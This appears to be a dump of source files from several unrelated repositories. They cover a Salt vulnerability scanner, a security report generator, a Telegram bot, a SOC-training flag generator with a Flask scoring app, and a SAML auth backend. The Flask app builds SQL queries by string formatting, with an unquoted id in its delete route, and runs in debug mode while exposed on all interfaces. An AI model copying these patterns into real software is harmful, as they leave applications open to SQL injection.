text=("Summary Report:"),
attachments=json.dumps(att),
thread_ts=id
)
if not response['ok']:
print("Slack Error: {}".format(response['error']))
def jira_alerter(result):
jira_options = {'server': jira_server}
jira = JIRA(options=jira_options, basic_auth=(jira_user, jira_pass))
issue_description = "List of the vulnerable hosts: \n"
for host, value in result.iteritems():
issue_description += ("[+] {}\n CVSS Score: {}\n CVSS Vector: {}\n Packages: {}\n"
.format(host,
value['cvss_score'],
value['cvss_vector'],
value['vuln_pkgs']))
issue_dict = {
'project': {'key': issue_projectKey},
'summary': issue_summary,
'description': issue_description,
'issuetype': {'name': issue_type},
'priority': {'name': issue_priority}
}
new_issue = jira.create_issue(fields=issue_dict)
print("+ JIRA issue created: {}".format(new_issue))
def opsgenie_alerter(result):
configuration.api_key['Authorization'] = opsgenie_api_key
configuration.api_key_prefix['Authorization'] = 'GenieKey'
issue_description = "List of the vulnerable hosts: \n"
for host, value in result.iteritems():
issue_description += ("[+] {}\n CVSS Score: {}\n CVSS Vector: {}\n Packages: {}\n"
.format(host,
value['cvss_score'],
value['cvss_vector'],
value['vuln_pkgs']))
body = CreateAlertRequest(
message=opsgenie_message,
description=issue_description,
tags=opsgenie_taglist,
entity=opsgenie_entity,
priority=opsgenie_priority,
source='Salt-Scanner',
# teams=[TeamRecipient(name='ops_team')],
# visible_to=[TeamRecipient(name='ops_team', type='team')],
note='Alert created')
try:
AlertApi().create_alert(body=body)
print("+ OpsGenie alert created")
except ApiException as err:
print("OpsGenie - Exception when calling AlertApi->create_alert: %s"
% err)
def parse_cmd_line_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-t', '--target-hosts',
type=str,
default=target_hosts
# help='Bash glob (e.g."prod-db*") or \
# python list of hosts (e.g."host1,host2")'
)
parser.add_argument(
'-tF', '--target-form',
type=str,
default='glob',
choices=["glob", "list", "grain"]
# help='Bash glob (e.g."prod-db*") or \
# python list of hosts (e.g."host1,host2"), or \
# Salt grains (e.g. "os:amazon" or "ec2_tags:role:webapp")'
)
parser.add_argument(
'-oN', '--os-name',
type=str,
default=default_os_name
# help='Default OS name'
)
parser.add_argument(
'-oV', '--os-version',
type=str,
default=default_os_ver
# help='Default OS version'
)
return parser.parse_args()
def main():
args = parse_cmd_line_args()
if slack_alert:
slack_tokenCheck()
# If default OS and Version is set
if all([args.os_name, args.os_version]):
print("+ Default OS: {}, Version: {}".format(
args.os_name, args.os_version
))
print("+ Getting the Installed Packages...")
pdict = get_packages(
args.os_name,
args.target_hosts,
args.target_form
)
if pdict:
audit(
pdict,
args.os_name,
args.os_version,
args.target_hosts
)
else:
print("Error: package list is empty")
# No default OS and Verison is set; Detecting the OS automatically
else:
print("+ No default OS is configured. Detecting OS...")
os_dict = get_os(
args.target_hosts,
args.target_form
)
if os_dict:
print("+ Detected Operating Systems:")
for os_nameVer, hlist in os_dict.iteritems():
os_info = os_nameVer.split('-')
print(" - OS Name: {}, OS Version: {}".format(
os_info[0],
os_info[1]))
print("+ Getting the Installed Packages...")
hosts = ','.join(hlist)
pdict = get_packages(
os_info[0],
hosts,
"list"
)
if pdict:
audit(
pdict,
os_info[0],
os_info[1],
args.target_hosts
)
else:
print("Error: package list is empty")
if __name__ == '__main__':
print(ASCII)
main()
``` |
{
"source": "0x4d-sh/security-report-generator-excel-to-docx",
"score": 3
} |
#### File: security-report-generator-excel-to-docx/core/utils.py
```python
import re
import math
import pandas as pd
from operator import itemgetter
from docxtpl import DocxTemplate
# Import issue library
def read_excel(file, sheet_name=0, header=0, type="record"):
df = pd.read_excel('{file}'.format(file=file), sheet_name=sheet_name, header=header, engine='openpyxl')
if type == "list":
return df.set_index("Issue Title").T.to_dict()
else:
return df.to_dict(orient='records')
def find_matching_key(lists, keyword):
for comp in lists:
if comp in keyword:
return comp
return None
def generate_report(template, content, output):
document = DocxTemplate(template)
document.render(content)
document.save(output)
def unflatten(file, library, configuration):
tmp = {}
unique = []
content = read_excel(file, sheet_name=0, header=0)
definition = read_excel(library, header=0, type="list")
# Create list of dict with array
for item in content:
tmp[item['Issue Title']] = {}
tmp[item['Issue Title']]['affected'] = []
count = 0
for item in content:
tmpk = {}
for k, v in item.items():
if k in configuration:
tmpk[clean_string(k)] = v
if k not in configuration:
if k == "Issue Title":
if isinstance(definition[item['Issue Title']]['New Title'], float):
tmp[item['Issue Title']][clean_string(k)] = item['Issue Title']
else:
tmp[item['Issue Title']][clean_string(k)] = definition[item['Issue Title']]['New Title']
else:
if isinstance(definition[item['Issue Title']][k], float):
tmp[item['Issue Title']][clean_string(k)] = ""
else:
tmp[item['Issue Title']][clean_string(k)] = definition[item['Issue Title']][k]
if "\"" in item['Affected File(s)']:
sheet_name = re.findall(r'"([^"]*)"', item['Affected File(s)'])
tmp[item['Issue Title']]['affected'] = retrieve_list(file, sheet_name, configuration)
else:
tmp[item['Issue Title']]['affected'].append(tmpk)
count = count + len(tmp[item['Issue Title']]['affected'])
for k, v in tmp.items():
unique.append(v)
# For debugging
# for i in unique:
# i = {k: str(v).encode("utf-8") for k,v in i.items()}
# print("{comp}:{x}".format(comp=i['issuetitle'],x=i['affected']))
print("[+] Added {count} records".format(count=count))
return unique
def retrieve_list(file, sheet_name, configuration):
list_of_items = []
sheet = read_excel(file, sheet_name=sheet_name[0], header=1)
for item in sheet:
tmp = {}
for k, v in item.items():
if k in configuration:
tmp[clean_string(k)] = v
list_of_items.append(tmp)
return list_of_items
def retrieve_definition(file, issue):
return issue
def print_list(content, key):
for item in content:
print(item[key])
def clean_string(word):
setting = str.maketrans({'(':None, ')':None, ' ':None})
return word.lower().translate(setting)
def sort_by_risk(content, definition):
# Sort definition by priority
order = sorted(definition, key=lambda x: definition[x]['priority'], reverse=True)
risk = {key: definition.get(key) for key in order}
tmp = content
for item in risk:
tmp = sorted(tmp, key=lambda x: risk[item]['order'].index(x[item]))
for item in tmp:
if item['risk'] == "Critical": item['background'] = '5f497a'
if item['risk'] == "High": item['background'] = 'c00000'
if item['risk'] == "Medium": item['background'] = 'e36c0a'
if item['risk'] == "Low": item['background'] = '339900'
if item['risk'] == "Informational": item['background'] = '0070c0'
return tmp
```
#### File: 0x4d-sh/security-report-generator-excel-to-docx/main.py
```python
import re
import os
import json
from docxtpl import DocxTemplate, RichText
from core import utils
def main():
with open('config.json') as f:
config = json.load(f)
document = DocxTemplate(config['template'])
# Initialize variables
assessment = {}
components = []
# Import assessment result from directory
for file_name in os.listdir(config['assessment']):
file_path = '{base}/{file}'.format(base=config['assessment'], file=file_name)
library_path = config['library']
if (component := utils.find_matching_key(config['components'], file_name)) is not None:
tmpd = {}
tmpd['name'] = config['components'][component]
tmpd['shortname'] = component
print("[*] Creating assessment,", tmpd['shortname'])
tmpd['findings'] = utils.sort_by_risk(utils.unflatten(file_path, library_path, config['group']), config['risk_matrix'])
components.append(tmpd)
assessment['components'] = components
assessment['report_config'] = config['report_configuration']
# For debugging
# print(assessment, file=open("debug.json", "w", encoding='utf-8'))
utils.generate_report(config['template'], assessment, config['report_name'])
print("[*] Report has been generated:", config['report_name'])
if __name__ == '__main__':
main()
``` |
{
"source": "0x4d-sh/telegram-bot-webhook-flask",
"score": 3
} |
#### File: 0x4d-sh/telegram-bot-webhook-flask/bot.py
```python
from flask import Flask, request
import requests
import telegram
# Config
TOKEN = "<number>:<alphanumeric>"
TELEGRAM_URL = "https://api.telegram.org/bot{token}".format(token=TOKEN)
WEBHOOK_URL = "https://<url>"
# To retrieve unique user chat ID and group ID, use @IDBot
WHITELISTED_USERS = []
bot = telegram.Bot(token=TOKEN)
# Bot
app = Flask(__name__)
def sendmessage(chat_id):
# As the bot is searchable and visble by public.
# Limit the response of bot to only specific chat IDs.
authorised = True if chat_id in WHITELISTED_USERS else False
message = "<Notification>"
if not authorised:
message = "You're not authorised."
url = "{telegram_url}/sendMessage".format(telegram_url=TELEGRAM_URL)
payload = {
"text": message,
"chat_id": chat_id
}
resp = requests.get(url,params=payload)
@app.route("/", methods=["POST","GET"])
def index():
if(request.method == "POST"):
response = request.get_json()
# To Debug
# print(response)
# To run only if 'message' exist in response.
if 'message' in response:
# To not response to other bots in the same group chat
if 'entities' not in response['message']:
chat_id = response["message"]["chat"]["id"]
sendmessage(chat_id)
return "Success"
@app.route("/setwebhook/")
def setwebhook():
s = requests.get("{telegram_url}/setWebhook?url={webhook_url}".format(telegram_url=TELEGRAM_URL,webhook_url=WEBHOOK_URL))
if s:
return "Success"
else:
return "Fail"
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "0x4e38/dpkt",
"score": 2
} |
#### File: dpkt/dpkt/tns.py
```python
import dpkt
class TNS(dpkt.Packet):
__hdr__ = (
('length', 'H', 0),
('pktsum', 'H', 0),
('type', 'B', 0),
('rsvd', 'B', 0),
('hdrsum', 'H', 0),
('msg', '0s', ''),
)
def unpack(self, buf):
dpkt.Packet.unpack(self, buf)
n = self.length - self.__hdr_len__
if n > len(self.data):
raise dpkt.NeedData('short message (missing %d bytes)' %
(n - len(self.data)))
self.msg = self.data[:n]
self.data = self.data[n:]
``` |
{
"source": "0x4e3/aperitive",
"score": 3
} |
#### File: aperitive/console/commander.py
```python
from __future__ import unicode_literals
import os
from aperitive.console.utils import find_commands, load_command_class
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
class Commander(object):
def __init__(self, cli):
self.cli = cli
def _load_commands(self):
command_dir = os.path.join(BASE_DIR, 'console')
command_names = find_commands(command_dir)
commands = list(map(
lambda cmd: load_command_class('aperitive', cmd),
command_names))
for command in commands:
self.cli.add_command(command)
def add_commands(self):
self._load_commands()
```
#### File: console/utils/importer.py
```python
from __future__ import unicode_literals
import six
import sys
from importlib import import_module
def import_string(dotted_path):
"""
Import a dotted module path and return the attribute/class designated
by the last name in the path. Raise ImportError if the import failed.
"""
try:
module_path, class_name = dotted_path.rsplit('.', 1)
except ValueError:
msg = "%s doesn't look like a module path" % dotted_path
six.reraise(ImportError, ImportError(msg), sys.exc_info()[2])
mod = import_module(module_path)
try:
return getattr(mod, class_name)
except AttributeError:
msg = 'Module "{}" does not define a "{}" attribute/class'.\
format(module_path, class_name)
six.reraise(ImportError, ImportError(msg), sys.exc_info()[2])
def load_command_class(app_name, name):
"""
Return command instance by given application name and command name.
"""
return import_string(
'{0}.console.commands.{1}.{1}'.format(app_name, name))
```
#### File: aperitive/tests/test_aperitive.py
```python
import os
import yaml
from click.testing import CliRunner
from aperitive import console
def test_command_line_interface():
"""Test the CLI."""
runner = CliRunner()
result = runner.invoke(console.cli)
assert result.exit_code == 0
assert 'Usage: ' in result.output
help_result = runner.invoke(console.cli, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
def test_init():
runner = CliRunner()
command_input = 'gitlab.com\napiuser\npwd\npwd' \
'\nredmine.com\napiuser\npwd\npwd'
# Test 'init' command in the isolated filesystem and
# custom config directory.
with runner.isolated_filesystem():
config_dir = './config'
config_file = os.path.join(config_dir, '.aperitive.yml')
result = runner.invoke(
console.cli,
['init', config_dir],
input=command_input + '\ny')
assert not result.exception
assert os.path.exists(config_dir) and os.path.isdir(config_dir)
assert os.path.exists(config_file) and os.path.isfile(config_file)
with open(config_file) as f:
config = yaml.load(f)
assert config['gitlab.server'] == 'gitlab.com'
assert config['redmine.server'] == 'redmine.com'
``` |
{
"source": "0x4e3/filertools",
"score": 2
} |
#### File: management/commands/old_files_migration.py
```python
from __future__ import unicode_literals, absolute_import
from django.contrib.contenttypes.models import ContentType
from django.core.management import call_command
from django.core.management.base import BaseCommand
from filer.models import File
from filertools.filertools.models import OrderedFile
class Command(BaseCommand):
help = 'Creates OrderFiles from Files'
def handle(self, *args, **options):
created_files_count = 0
folders_for_rebuild = set()
ordered_file_content_type = \
ContentType.objects.get_for_model(OrderedFile)
for filer_file in File.objects.all():
try:
filer_file.orderedfile
except OrderedFile.DoesNotExist:
ordered_file = OrderedFile(file_ptr_id=filer_file.id)
ordered_file.__dict__.update(filer_file.__dict__)
ordered_file.polymorphic_ctype = ordered_file_content_type
ordered_file.order = 1
ordered_file.save()
created_files_count += 1
else:
# already has ordered file
continue
if created_files_count:
self.stdout.write(
self.style.SUCCESS(
'Successfully created {} '
'OrderedFile`s'.format(created_files_count)))
if folders_for_rebuild:
for folder_id in folders_for_rebuild:
call_command('rebuild_order', folder_id=folder_id)
```
#### File: management/commands/rebuild_order.py
```python
from __future__ import unicode_literals, absolute_import
from django.core.management.base import BaseCommand, CommandError
from filer.models import Folder
from filertools.filertools.models import OrderedFile
class Command(BaseCommand):
help = 'Fixes ordering for specified folder or for whole tree'
def __init__(self, stdout=None, stderr=None, no_color=False):
self.rebuilt_folders_count = 0
super(Command, self).__init__(stdout, stderr, no_color)
def add_arguments(self, parser):
parser.add_argument('folder_id', nargs='?', type=int, default=None)
parser.add_argument('with_children', nargs='?',
type=bool, default=True)
def process_folder(self, folder):
ordered_files = OrderedFile.objects.filter(folder_id=folder.id)
orders = [order for order in range(len(ordered_files))][::-1]
for ordered_file in ordered_files:
ordered_file.order = orders.pop()
ordered_file.save()
self.rebuilt_folders_count += 1
def traverse_folders_tree(self, folder, with_children):
self.process_folder(folder)
if not with_children:
return
children = folder.children.all()
for child in children:
self.traverse_folders_tree(child, with_children)
return
def handle(self, *args, **options):
if options['folder_id']:
try:
folder = Folder.objects.get(id=options['folder_id'])
except Folder.DoesNotExist:
raise CommandError('Incorrect folder id')
folders = [folder]
else:
folders = Folder.objects.filter(parent=None)
for folder in folders:
self.traverse_folders_tree(folder, options['with_children'])
if self.rebuilt_folders_count:
self.stdout.write(
self.style.SUCCESS(
'Successfully rebuilt {} '
'folders'.format(self.rebuilt_folders_count)))
```
#### File: filertools/filertools/utils.py
```python
from __future__ import unicode_literals, absolute_import
from filer.models import Folder
def copy_filer_folder_structure(source_id=None, final_id=None):
def create_sub_folders_for_folder(folder, destination):
created_destination = \
Folder.objects.create(name=folder, parent=destination)
for f in folder.children.all():
create_sub_folders_for_folder(f, created_destination)
if not source_id or not final_id:
return
original_root = Folder.objects.get(id=source_id)
destination_root = Folder.objects.get(id=final_id)
for sub_folder in original_root.children.all():
create_sub_folders_for_folder(sub_folder, destination_root)
``` |
{
"source": "0x4F776C/Python-SoC-training-platform",
"score": 2
} |
#### File: code/generator/main.py
```python
from template import *
def main():
for i in range(10):
flag = createFlag()
exec_list = [tcpTraffic, fuzzDataTCP, icmpTraffic, fuzzDataICMP, dnsTraffic, fuzzDataDNS, httpTraffic, fuzzDataHTTP]
exec_me = random.randint(0, 7)
if (exec_me == 1) or (exec_me == 3) or (exec_me == 5) or (exec_me == 7):
exec_list[exec_me]()
sleepTimer()
else:
exec_list[exec_me](flag)
addFlagToDB(flag)
sleepTimer()
return None
if __name__ == "__main__":
main()
```
#### File: code/platform/app.py
```python
from flask import *
from flask_mysqldb import *
from MySQLdb import *
import os
app = Flask(__name__)
app.secret_key = "flash message" # Required for flash message to work
app.config["MYSQL_HOST"] = "localhost" # Location/Address of MySQL server
app.config["MYSQL_USER"] = "wss" # MySQL username
app.config["MYSQL_PASSWORD"] = "<PASSWORD>" # MySQL user password
app.config["MYSQL_DB"] = "MP" # The database name
mysql = MySQL(app)
@app.route("/")
def index():
cur = mysql.connection.cursor()
cur.execute("SELECT COUNT(id) FROM MP.tblBlueFlags")
total_score = cur.fetchone()
cur.close()
cur = mysql.connection.cursor()
cur.execute("SELECT sum(solved) FROM MP.tblBlueFlags")
current_score = cur.fetchone()
cur.close()
return render_template("index.html", total_score=total_score[0], current_score=current_score[0])
@app.route("/flags")
def flags():
cur = mysql.connection.cursor()
cur.execute("SELECT * FROM tblBlueFlags")
data = cur.fetchall()
cur.close()
return render_template("flags.html", flags=data)
@app.route("/insert", methods=["POST"])
def insert():
if request.method == "POST":
flag = request.form["flag"]
escape_string_flag = escape_string(flag)
clean_flag = escape_string_flag.decode("utf-8")
cur = mysql.connection.cursor()
cur.execute("SELECT flag from tblBlueFlags WHERE flag='flag{%s}'" % clean_flag)
row_count = cur.rowcount
cur.close()
if row_count == 0:
flash("Flag added successfully")
cur = mysql.connection.cursor()
cur.execute("INSERT INTO tblBlueFlags (flag) VALUES ('flag{%s}')" % clean_flag)
mysql.connection.commit()
return redirect(url_for("flags"))
else:
flash("Flag already exist")
return redirect(url_for("flags"))
@app.route("/delete/<string:id_data>", methods=["POST", "GET"])
def delete(id_data):
input_id = id_data
escape_string_id = escape_string(input_id)
clean_id = escape_string_id.decode("utf-8")
cur = mysql.connection.cursor()
cur.execute("SELECT id from tblBlueFlags WHERE id=%s" % clean_id)
row_count = cur.rowcount
cur.close()
if row_count != 0:
flash("Flag deleted successfully")
input_id = id_data
escape_string_id = escape_string(input_id)
clean_id = escape_string_id.decode("utf-8")
cur = mysql.connection.cursor()
cur.execute("DELETE FROM tblBlueFlags WHERE id=%s" % clean_id)
mysql.connection.commit()
return redirect(url_for("flags"))
else:
flash("Invalid id")
return redirect(url_for("flags"))
@app.route("/check", methods=["POST"])
def check():
if request.method == "POST":
flag = request.form["flag"]
escape_string_flag = escape_string(flag)
clean_flag = escape_string_flag.decode("utf-8")
cur = mysql.connection.cursor()
cur.execute("SELECT flag from tblBlueFlags WHERE flag='flag{%s}'" % clean_flag)
row_count = cur.rowcount
cur.close()
if row_count == 0:
flash("Flag does not exist")
return redirect(url_for("index"))
else:
cur = mysql.connection.cursor()
cur.execute("SELECT solved from tblBlueFlags WHERE flag='flag{%s}'" % clean_flag)
solved_value = cur.fetchone()
cur.close()
if solved_value[0] is None:
flash("Flag submitted")
cur = mysql.connection.cursor()
cur.execute("UPDATE tblBlueFlags SET solved=1 WHERE flag='flag{%s}'" % clean_flag)
mysql.connection.commit()
return redirect(url_for("index"))
elif solved_value[0] == 1:
flash("Flag has already been submitted")
return redirect(url_for("index"))
else:
flash("Unknown error encountered. Contact lecturer")
return redirect(url_for("index"))
@app.route("/donate")
def donate():
return redirect("https://www.blockchain.com/btc/address/37jdCj8dePgU5iy5zp3RtSCFo5XndaxKXe") # Just a simple donation redirection
@app.route("/generate")
def generate():
command = "sudo /home/wss/Desktop/MP/script/generator.sh" # Modify the directory where generator.sh resides
os.system(command)
flash("Generated new flags")
return redirect(url_for("index"))
@app.route("/drop")
def drop():
cur = mysql.connection.cursor()
cur.execute("TRUNCATE TABLE tblBlueFlags")
cur.close()
flash("Deleted all flags")
return redirect(url_for("index"))
if __name__ == "__main__":
app.run(host="0.0.0.0",port=8888,debug=True) # Feel free to change the binding address and port number
``` |
{
"source": "0x53A/sdk",
"score": 2
} |
#### File: manpages/tool/man-pandoc-filter.py
```python
import copy
from pandocfilters import toJSONFilters, Para, Str, Header, Space
def fail_on_includes(key, value, format, meta):
if key == 'Para' and value[0]['c'] == '[!INCLUDE':
assert False, 'Found an unexpected [!INCLUDE'
def promote_and_capitalize_sections(key, value, format, meta):
if key == 'Header':
header_contents = value[2]
header_text = ' '.join([ x['c'] for x in header_contents if x['t'] == 'Str']).lower()
if header_text in ['name', 'synopsis', 'description', 'options', 'examples', 'environment variables']:
# capitalize
for element in header_contents:
if element['t'] == 'Str':
element['c'] = element['c'].upper()
# promote
value = Header(1, value[1], header_contents)
return value
return None
def demote_net_core_1_2(key, value, format, meta):
if key == 'Header':
header_id = value[1][0]
if header_id.startswith('net-core-'):
value = Header(2, value[1], value[2][0]['c'][1])
return value
return None
def main():
toJSONFilters([
fail_on_includes,
promote_and_capitalize_sections,
demote_net_core_1_2,
])
if __name__ == '__main__':
main()
```
#### File: manpages/tool/remove-metadata-and-embed-includes.py
```python
import re
import os
import os.path
import sys
def git_root(file):
dirname = os.path.dirname(file)
while True:
if os.path.isdir(os.path.join(dirname, '.git')):
return dirname
dirname = os.path.abspath(os.path.join(dirname, '..'))
if dirname == '/':
assert False, 'at root directory now'
def read_lines_document_file(this_file, original_lines):
result = []
lines = original_lines
# metadata section is optional
if lines[0] == '---' + os.linesep:
# remove first ---
lines = lines[1:]
# find index of second --- and remove that and everything before it
for i in range(len(lines)):
if lines[i] == '---' + os.linesep:
lines = lines[i+1:]
break
for line in lines:
if '[!INCLUDE' in line:
match = re.search(r'\[!INCLUDE *\[[^\]]+\] *\(([^)]+)\)', line)
if match:
relative_path = match.groups()[0]
if relative_path.startswith('~/'):
git_repo_root = git_root(this_file) + '/'
file_to_include = os.path.join(git_repo_root, relative_path[2:])
else:
file_to_include = os.path.join(os.path.dirname(this_file), relative_path)
with open(file_to_include) as f:
lines_to_include = f.readlines()
result.extend(read_lines_document_file(file_to_include, lines_to_include))
else:
assert False, 'Unable to parse: ' + line
else:
result.append(line)
return result
def main(args):
filename = args[1]
with open(filename) as original:
lines = read_lines_document_file(filename, original.readlines())
with open(filename + '.tmp', 'w') as output:
for line in lines:
output.write(line)
os.replace(filename + '.tmp', filename)
if __name__ == '__main__':
sys.exit(main(sys.argv))
``` |
{
"source": "0x55AAh/anthill_gaming",
"score": 3
} |
#### File: social/backends/base.py
```python
from anthill.framework.auth.social.core.backends import base
import inspect
# noinspection PyAbstractClass
class BaseAuth(base.BaseAuth):
"""
A authentication backend that authenticates the user based on
the provider response.
"""
async def start(self):
if await self.uses_redirect():
return self.strategy.redirect(self.auth_url())
else:
return self.strategy.html(await self.auth_html())
def auth_complete(self, *args, **kwargs):
"""Completes loging process, must return user instance."""
raise NotImplementedError('Implement in subclass')
def complete(self, *args, **kwargs):
return self.auth_complete(*args, **kwargs)
async def authenticate(self, *args, **kwargs):
"""
Authenticate user using social credentials.
Authentication is made if this is the correct backend, backend
verification is made by kwargs inspection for current backend
name presence.
"""
# Validate backend and arguments. Require that the Social Auth
# response be passed in as a keyword argument, to make sure we
# don't match the username/password calling conventions of
# authenticate.
if 'backend' not in kwargs or kwargs['backend'].name != self.name or \
'strategy' not in kwargs or 'response' not in kwargs:
return None
self.strategy = kwargs.get('strategy') or self.strategy
self.redirect_uri = kwargs.get('redirect_uri') or self.redirect_uri
self.data = self.strategy.request_data()
kwargs.setdefault('is_new', False)
pipeline = self.strategy.get_pipeline(self)
args, kwargs = self.strategy.clean_authenticate_args(*args, **kwargs)
return await self.pipeline(pipeline, *args, **kwargs)
async def pipeline(self, pipeline, pipeline_index=0, *args, **kwargs):
out = await self.run_pipeline(pipeline, pipeline_index, *args, **kwargs)
if not isinstance(out, dict):
return out
user = out.get('user')
if user:
user.social_user = out.get('social')
user.is_new = out.get('is_new')
return user
async def disconnect(self, *args, **kwargs):
pipeline = self.strategy.get_disconnect_pipeline(self)
kwargs['name'] = self.name
kwargs['user_storage'] = self.strategy.storage.user
return await self.run_pipeline(pipeline, *args, **kwargs)
async def run_pipeline(self, pipeline, pipeline_index=0, *args, **kwargs):
out = kwargs.copy()
out.setdefault('strategy', self.strategy)
out.setdefault('backend', out.pop(self.name, None) or self)
out.setdefault('request', self.strategy.request_data())
out.setdefault('details', {})
if not isinstance(pipeline_index, int) or \
pipeline_index < 0 or pipeline_index >= len(pipeline):
pipeline_index = 0
for idx, name in enumerate(pipeline[pipeline_index:]):
out['pipeline_index'] = pipeline_index + idx
func = module_member(name)
if inspect.iscoroutinefunction(func):
result = await func(*args, **out) or {}
else:
result = func(*args, **out) or {}
if not isinstance(result, dict):
return result
out.update(result)
return out
def get_user(self, user_id):
"""Return user with given ID from the User model used by this backend."""
return self.strategy.get_user(user_id)
async def continue_pipeline(self, partial):
"""Continue previous halted pipeline."""
return await self.strategy.authenticate(
self, pipeline_index=partial.next_step, *partial.args, **partial.kwargs)
```
#### File: core/backends/saml.py
```python
from onelogin.saml2.auth import OneLogin_Saml2_Auth
from onelogin.saml2.settings import OneLogin_Saml2_Settings
from .base import BaseAuth
from ..exceptions import AuthFailed, AuthMissingParameter
# Helpful constants:
OID_COMMON_NAME = "urn:oid:2.5.4.3"
OID_EDU_PERSON_PRINCIPAL_NAME = "urn:oid:1.3.6.1.4.1.5923.1.1.1.6"
OID_EDU_PERSON_ENTITLEMENT = "urn:oid:1.3.6.1.4.1.5923.1.1.1.7"
OID_GIVEN_NAME = "urn:oid:2.5.4.42"
OID_MAIL = "urn:oid:0.9.2342.19200300.100.1.3"
OID_SURNAME = "urn:oid:2.5.4.4"
OID_USERID = "urn:oid:0.9.2342.19200300.100.1.1"
class SAMLIdentityProvider(object):
"""Wrapper around configuration for a SAML Identity provider"""
def __init__(self, name, **kwargs):
"""Load and parse configuration"""
self.name = name
# name should be a slug and must not contain a colon, which
# could conflict with uid prefixing:
assert ':' not in self.name and ' ' not in self.name, \
'IdP "name" should be a slug (short, no spaces)'
self.conf = kwargs
def get_user_permanent_id(self, attributes):
"""
The most important method: Get a permanent, unique identifier
for this user from the attributes supplied by the IdP.
If you want to use the NameID, it's available via
attributes['name_id']
"""
uid = attributes[self.conf.get('attr_user_permanent_id', OID_USERID)]
if isinstance(uid, list):
uid = uid[0]
return uid
# Attributes processing:
def get_user_details(self, attributes):
"""
Given the SAML attributes extracted from the SSO response, get
the user data like name.
"""
return {
'fullname': self.get_attr(attributes, 'attr_full_name',
OID_COMMON_NAME),
'first_name': self.get_attr(attributes, 'attr_first_name',
OID_GIVEN_NAME),
'last_name': self.get_attr(attributes, 'attr_last_name',
OID_SURNAME),
'username': self.get_attr(attributes, 'attr_username',
OID_USERID),
'email': self.get_attr(attributes, 'attr_email',
OID_MAIL),
}
def get_attr(self, attributes, conf_key, default_attribute):
"""
Internal helper method.
Get the attribute 'default_attribute' out of the attributes,
unless self.conf[conf_key] overrides the default by specifying
another attribute to use.
"""
key = self.conf.get(conf_key, default_attribute)
value = attributes[key] if key in attributes else None
if isinstance(value, list):
value = value[0]
return value
@property
def entity_id(self):
"""Get the entity ID for this IdP"""
# Required. e.g. "https://idp.testshib.org/idp/shibboleth"
return self.conf['entity_id']
@property
def sso_url(self):
"""Get the SSO URL for this IdP"""
# Required. e.g.
# "https://idp.testshib.org/idp/profile/SAML2/Redirect/SSO"
return self.conf['url']
@property
def x509cert(self):
"""X.509 Public Key Certificate for this IdP"""
return self.conf['x509cert']
@property
def saml_config_dict(self):
"""Get the IdP configuration dict in the format required by
python-saml"""
return {
'entityId': self.entity_id,
'singleSignOnService': {
'url': self.sso_url,
# python-saml only supports Redirect
'binding': 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect'
},
'x509cert': self.x509cert,
}
class DummySAMLIdentityProvider(SAMLIdentityProvider):
"""
A placeholder IdP used when we must specify something, e.g. when
generating SP metadata.
If OneLogin_Saml2_Auth is modified to not always require IdP
config, this can be removed.
"""
def __init__(self):
super(DummySAMLIdentityProvider, self).__init__(
'dummy',
entity_id='https://dummy.none/saml2',
url='https://dummy.none/SSO',
x509cert=''
)
class SAMLAuth(BaseAuth):
"""
PSA Backend that implements SAML 2.0 Service Provider (SP) functionality.
Unlike all of the other backends, this one can be configured to work with
many identity providers (IdPs). For example, a University that belongs to a
Shibboleth federation may support authentication via ~100 partner
universities. Also, the IdP configuration can be changed at runtime if you
require that functionality - just subclass this and override `get_idp()`.
Several settings are required. Here's an example:
SOCIAL_AUTH_SAML_SP_ENTITY_ID = "https://saml.example.com/"
SOCIAL_AUTH_SAML_SP_PUBLIC_CERT = "... X.509 certificate string ..."
SOCIAL_AUTH_SAML_SP_PRIVATE_KEY = "... private key ..."
SOCIAL_AUTH_SAML_ORG_INFO = {
"en-US": {
"name": "example",
"displayname": "Example Inc.",
"url": "http://example.com"
}
}
SOCIAL_AUTH_SAML_TECHNICAL_CONTACT = {
"givenName": "<NAME>",
"emailAddress": "<EMAIL>"
}
SOCIAL_AUTH_SAML_SUPPORT_CONTACT = {
"givenName": "<NAME>",
"emailAddress": "<EMAIL>"
}
SOCIAL_AUTH_SAML_ENABLED_IDPS = {
"testshib": {
"entity_id": "https://idp.testshib.org/idp/shibboleth",
"url": "https://idp.testshib.org/idp/profile/SAML2/Redirect/SSO",
"x509cert": "MIIEDjCCAvagAwIBAgIBADANBgkqhkiG9w0B...
...8Bbnl+ev0peYzxFyF5sQA==",
}
}
Optional settings:
SOCIAL_AUTH_SAML_SP_EXTRA = {}
SOCIAL_AUTH_SAML_SECURITY_CONFIG = {}
"""
name = "saml"
EXTRA_DATA = []
def get_idp(self, idp_name):
"""Given the name of an IdP, get a SAMLIdentityProvider instance"""
idp_config = self.setting('ENABLED_IDPS')[idp_name]
return SAMLIdentityProvider(idp_name, **idp_config)
def generate_saml_config(self, idp=None):
"""
Generate the configuration required to instantiate OneLogin_Saml2_Auth
"""
# The shared absolute URL that all IdPs redirect back to -
# this is specified in our metadata.xml:
abs_completion_url = self.redirect_uri
config = {
'contactPerson': {
'technical': self.setting('TECHNICAL_CONTACT'),
'support': self.setting('SUPPORT_CONTACT')
},
'debug': True,
'idp': idp.saml_config_dict if idp else {},
'organization': self.setting('ORG_INFO'),
'security': {
'metadataValidUntil': '',
'metadataCacheDuration': 'P10D', # metadata valid for ten days
},
'sp': {
'assertionConsumerService': {
'url': abs_completion_url,
# python-saml only supports HTTP-POST
'binding': 'urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST'
},
'entityId': self.setting('SP_ENTITY_ID'),
'x509cert': self.setting('SP_PUBLIC_CERT'),
'privateKey': self.setting('SP_PRIVATE_KEY'),
},
'strict': True, # We must force strict mode - for security
}
config["security"].update(self.setting("SECURITY_CONFIG", {}))
config["sp"].update(self.setting("SP_EXTRA", {}))
return config
def generate_metadata_xml(self):
"""
Helper method that can be used from your web app to generate the XML
metadata required to link your web app as a Service Provider.
Returns (metadata XML string, list of errors)
Example usage (Django):
from ..apps.django_app.utils import load_strategy, \
load_backend
def saml_metadata_view(request):
complete_url = reverse('social:complete', args=("saml", ))
saml_backend = load_backend(load_strategy(request), "saml",
complete_url)
metadata, errors = saml_backend.generate_metadata_xml()
if not errors:
return HttpResponse(content=metadata,
content_type='text/xml')
